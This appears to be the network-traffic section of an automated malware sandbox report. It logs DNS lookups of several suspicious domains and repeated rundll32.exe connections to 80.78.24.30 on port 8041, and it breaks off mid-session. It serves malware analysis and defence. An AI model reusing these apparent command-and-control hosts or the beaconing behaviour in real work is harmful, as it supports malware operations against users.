                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.798579931 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.266311884 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.271502018 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.272114992 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.272129059 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.311940908 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.311958075 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.427480936 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.427530050 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.427988052 CEST624118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.428704023 CEST624118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.428832054 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.433460951 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.433804989 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.435542107 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.435870886 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.440681934 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.758096933 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.758188009 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.758352995 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.762128115 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.762159109 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.855417967 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.855465889 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.858257055 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.863411903 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.863431931 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074749947 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074805021 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074839115 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074929953 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.075265884 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.075784922 CEST624158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.080091953 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.080925941 CEST80416241580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.080986023 CEST624158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.081101894 CEST624158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.087163925 CEST80416241580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.087923050 CEST80416241580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.087971926 CEST624158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.326440096 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.326541901 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.328082085 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.328109980 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.329442024 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.329453945 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.767904043 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.767970085 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768033981 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768073082 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768081903 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768122911 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768260002 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768295050 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863226891 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863262892 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863362074 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863589048 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863603115 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.331527948 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.334866047 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.335256100 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.335288048 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.336261988 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.336276054 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.783756018 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.783916950 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.787553072 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.795429945 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.795488119 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:19.959419012 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:19.959470987 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:19.963546038 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:19.964066982 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:19.964082003 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.123416901 CEST624188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.128485918 CEST80416241880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.129821062 CEST624188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.133749008 CEST624188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.138514042 CEST80416241880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.443185091 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.443541050 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.444572926 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.444586039 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.445432901 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.445441961 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.748904943 CEST80416241880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.748930931 CEST80416241880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.749109983 CEST624188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.749376059 CEST624188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.749900103 CEST624198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.754323006 CEST80416241880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.754894972 CEST80416241980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.755090952 CEST624198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.759442091 CEST624198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.764357090 CEST80416241980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.885652065 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.885761023 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.885797024 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.885906935 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.885981083 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.885981083 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.886050940 CEST62417443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:20.886077881 CEST44362417188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.029764891 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.029812098 CEST44362420188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.029865980 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.030200005 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.030213118 CEST44362420188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.386271954 CEST80416241980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.386324883 CEST80416241980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.386495113 CEST624198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.386495113 CEST624198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.386779070 CEST624198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.387202978 CEST624218041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.391587973 CEST80416241980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.392103910 CEST80416242180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.392165899 CEST624218041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.392292976 CEST624218041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.397334099 CEST80416242180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.397382975 CEST624218041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.502151966 CEST44362420188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.502201080 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.502733946 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.502739906 CEST44362420188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.504142046 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.504148006 CEST44362420188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.984854937 CEST44362420188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.984942913 CEST44362420188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.985661983 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:21.985661983 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:25.171977043 CEST62420443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:25.171999931 CEST44362420188.114.97.3192.168.2.7

                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:22.852566957 CEST6004853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:23.011220932 CEST53600481.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:36.778333902 CEST5692253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:36.828243971 CEST53569221.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:36.998089075 CEST53539871.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:51.636615038 CEST53606771.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:57.709093094 CEST5774053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:58.707938910 CEST5774053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:58.847457886 CEST53577401.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:58.847788095 CEST53577401.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:03.740381002 CEST5353182162.159.36.2192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:04.242069960 CEST53505101.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:18.158830881 CEST6476753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:18.326425076 CEST53647671.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:23.120454073 CEST5935353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:23.157037973 CEST53593531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:27.010699034 CEST5768053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:27.162569046 CEST53576801.1.1.1192.168.2.7

                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:22.852566957 CEST192.168.2.71.1.1.10x77cdStandard query (0)tiguanin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:36.778333902 CEST192.168.2.71.1.1.10x5fe8Standard query (0)bazarunet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:57.709093094 CEST192.168.2.71.1.1.10xe18bStandard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:58.707938910 CEST192.168.2.71.1.1.10xe18bStandard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:18.158830881 CEST192.168.2.71.1.1.10x8e6Standard query (0)greshunka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:23.120454073 CEST192.168.2.71.1.1.10xc6e3Standard query (0)isomicrotich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:27.010699034 CEST192.168.2.71.1.1.10x52e9Standard query (0)greshunka.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:23.011220932 CEST1.1.1.1192.168.2.70x77cdNo error (0)tiguanin.com80.78.24.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:36.828243971 CEST1.1.1.1192.168.2.70x5fe8No error (0)bazarunet.com80.78.24.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:58.847457886 CEST1.1.1.1192.168.2.70xe18bNo error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:58.847788095 CEST1.1.1.1192.168.2.70xe18bNo error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:18.326425076 CEST1.1.1.1192.168.2.70x8e6No error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:23.157037973 CEST1.1.1.1192.168.2.70xc6e3No error (0)isomicrotich.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:23.157037973 CEST1.1.1.1192.168.2.70xc6e3No error (0)isomicrotich.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:27.162569046 CEST1.1.1.1192.168.2.70x52e9No error (0)greshunka.com82.115.223.39A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                • isomicrotich.com

                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.74970180.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:23.648807049 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.74970280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:24.416102886 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.74970480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:28.113327026 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.74970580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:28.760137081 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.74971080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:34.655071020 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.74971280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:35.671681881 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                6192.168.2.74971580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:37.563316107 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                7192.168.2.76379080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:38.232124090 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                8192.168.2.76379280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:43.137300014 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.76379380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:43.961194992 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                10192.168.2.76379580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:46.663008928 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                11192.168.2.76379680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:47.467716932 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                12192.168.2.75745280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:53.144684076 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                13192.168.2.75745380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:53.791240931 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                14192.168.2.75745580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:54.505851984 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                15192.168.2.75745680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
